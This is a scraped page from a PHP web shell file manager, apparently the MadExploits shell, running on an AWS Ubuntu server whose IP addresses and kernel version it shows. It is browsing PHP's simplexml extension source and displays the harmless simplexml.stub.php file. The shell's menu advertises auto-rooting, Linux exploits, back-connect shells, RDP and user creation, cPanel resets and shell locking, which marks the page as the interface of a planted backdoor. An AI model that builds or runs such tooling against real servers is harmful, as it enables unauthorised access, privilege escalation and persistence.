Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 18.223.209.231
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
php /
81 /
src /
ext /
simplexml /
[ HOME SHELL ]
Name
Size
Permission
Action
tests
[ DIR ]
drwxr-xr-x
CREDITS
56
B
-rw-r--r--
config.m4
695
B
-rw-r--r--
config.w32
969
B
-rw-r--r--
php_simplexml.h
2.49
KB
-rw-r--r--
php_simplexml_exports.h
2.04
KB
-rw-r--r--
simplexml.c
69.04
KB
-rw-r--r--
simplexml.stub.php
2.85
KB
-rw-r--r--
simplexml_arginfo.h
9.38
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : simplexml.stub.php
<?php /** @generate-class-entries */ function simplexml_load_file(string $filename, ?string $class_name = SimpleXMLElement::class, int $options = 0, string $namespace_or_prefix = "", bool $is_prefix = false): SimpleXMLElement|false {} function simplexml_load_string(string $data, ?string $class_name = SimpleXMLElement::class, int $options = 0, string $namespace_or_prefix = "", bool $is_prefix = false): SimpleXMLElement|false {} function simplexml_import_dom(SimpleXMLElement|DOMNode $node, ?string $class_name = SimpleXMLElement::class): ?SimpleXMLElement {} /** @not-serializable */ class SimpleXMLElement implements Stringable, Countable, RecursiveIterator { /** @tentative-return-type */ public function xpath(string $expression): array|null|false {} /** @tentative-return-type */ public function registerXPathNamespace(string $prefix, string $namespace): bool {} /** @tentative-return-type */ public function asXML(?string $filename = null): string|bool {} /** * @tentative-return-type * @alias SimpleXMLElement::asXML */ public function saveXML(?string $filename = null): string|bool {} /** @tentative-return-type */ public function getNamespaces(bool $recursive = false): array {} /** @tentative-return-type */ public function getDocNamespaces(bool $recursive = false, bool $fromRoot = true): array|false {} /** @tentative-return-type */ public function children(?string $namespaceOrPrefix = null, bool $isPrefix = false): ?SimpleXMLElement {} /** @tentative-return-type */ public function attributes(?string $namespaceOrPrefix = null, bool $isPrefix = false): ?SimpleXMLElement {} public function __construct(string $data, int $options = 0, bool $dataIsURL = false, string $namespaceOrPrefix = "", bool $isPrefix = false) {} /** @tentative-return-type */ public function addChild(string $qualifiedName, ?string $value = null, ?string $namespace = null): ?SimpleXMLElement {} /** @tentative-return-type */ public function addAttribute(string $qualifiedName, string $value, ?string $namespace = null): void {} /** @tentative-return-type */ public function getName(): string {} public function __toString(): string {} /** @tentative-return-type */ public function count(): int {} /** @tentative-return-type */ public function rewind(): void {} /** @tentative-return-type */ public function valid(): bool {} /** @tentative-return-type */ public function current(): SimpleXMLElement {} /** @tentative-return-type */ public function key(): string {} /** @tentative-return-type */ public function next(): void {} /** @tentative-return-type */ public function hasChildren(): bool {} /** @tentative-return-type */ public function getChildren(): ?SimpleXMLElement {} } class SimpleXMLIterator extends SimpleXMLElement { }
Close